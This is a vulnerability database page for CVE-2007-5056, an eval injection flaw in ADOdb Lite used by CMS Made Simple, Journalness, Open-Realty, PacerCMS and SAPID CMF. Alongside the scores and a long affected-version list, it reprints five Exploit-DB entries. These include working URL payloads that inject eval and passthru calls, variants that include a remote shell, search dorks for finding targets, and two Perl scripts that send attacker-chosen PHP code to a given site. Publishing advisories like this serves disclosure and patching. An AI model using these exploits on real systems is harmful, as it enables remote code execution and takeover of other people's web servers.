CVE-2007-5056
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF, Journalness, PacerCMS, and Open-Realty, allows remote attackers to execute arbitrary code via PHP sequences in the last_module parameter.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 4442
Publication date : 2007-09-20 22h00 +00:00
Author : irk4z
EDB Verified : Yes
# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #
# author: [email protected] #
# download: #
# http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip #
# dork: "powered by CMS Made Simple version 1.1.2" #
# greetz: cOndemned, kacper, str0ke #
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]
# milw0rm.com [2007-09-21]
Exploit Database EDB-ID : 5091
Publication date : 2008-02-08 23h00 +00:00
Author : Iron
EDB Verified : Yes
#!/usr/bin/perl
#
# Vendor url: journalness.sourceforge.net
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
print "#
# Journalness <= 4.1 Remote Code Execution exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group & dHack
#
# Example target url: http://www.target.com/journalnessdir/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "includes/database/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};".$code."//";
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($target);
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
# milw0rm.com [2008-02-09]
Exploit Database EDB-ID : 5090
Publication date : 2008-02-08 23h00 +00:00
Author : Iron
EDB Verified : Yes
#!/usr/bin/perl
#
# Vendor url: www.open-realty.org
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
print "#
# Open-Realty <= 2.4.3 Remote Code Execution exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/openrealtydir/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "include/class/adodb/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};".$code."//";
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($target);
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
# milw0rm.com [2008-02-09]
Exploit Database EDB-ID : 5098
Publication date : 2008-02-09 23h00 +00:00
Author : GoLd_M
EDB Verified : Yes
### PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability
### Script : http://ovh.dl.sourceforge.net/sourceforge/pacercms/pacercms0.6.zip
### Dork : Powered by PacerCMS
### POC :
### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
### OR INCLUDE SHELL
### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
### I'm TrYaGi ......:)
# milw0rm.com [2008-02-10]
Exploit Database EDB-ID : 5097
Publication date : 2008-02-09 23h00 +00:00
Author : GoLd_M
EDB Verified : Yes
### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability
### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip
### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip
### Dork : Powered by SAPID CMF Build 87
### Vuln :
### 09: */
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
### POC :
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
### OR INCLUDE SHELL
### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
### I'm TrYaGi ......:)
# milw0rm.com [2008-02-10]
Products Mentioned
Configuraton 0
Adodb_lite>>Adodb_lite >> Version To (including) 1.42
Cmsmadesimple>>Cms_made_simple >> Version *
- Cmsmadesimple>>Cms_made_simple >> Version - (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.3.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.3.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.4.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.5.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.6.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.6.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.6.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.7.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.7.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.7.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.8.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.8.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.9 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.9.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.9.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.11 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.11.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.11.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.12 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.12.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.12.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.13 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.3.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.4.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.3.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.4.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.9 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.10 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.7.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.8.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.8.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.9 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.9.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.9.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.9.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.9.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.9.4.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.9.4.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.9.4.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.10 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.10.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.10.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.10.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.9 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.10 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.11 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.12 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.11.13 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.12 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.12.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.12.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.0 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.0 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.0 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.0 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.0 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.0.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.0.1.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.1.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.1.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.1.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.1.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.1.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.3.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.9 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.9.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.10 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.11 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.12 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.13 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.14 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.15 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.17 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.2.18 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 2.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 3.0.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 3.0.2 (Open CPE detail)
Journalness>>Journalness >> Version *
Open-realty>>Open-realty >> Version *
- Open-realty>>Open-realty >> Version 2.3.1 (Open CPE detail)
- Open-realty>>Open-realty >> Version 2.3.4 (Open CPE detail)
- Open-realty>>Open-realty >> Version 2.5.8 (Open CPE detail)
Pacercms>>Pacercms >> Version *
Sapid>>Sapid_cmf >> Version *
References
http://www.attrition.org/pipermail/vim/2007-September/001800.html
Tags : mailing-list, x_refsource_VIM
Tags : mailing-list, x_refsource_VIM
2025©
tesweb SA
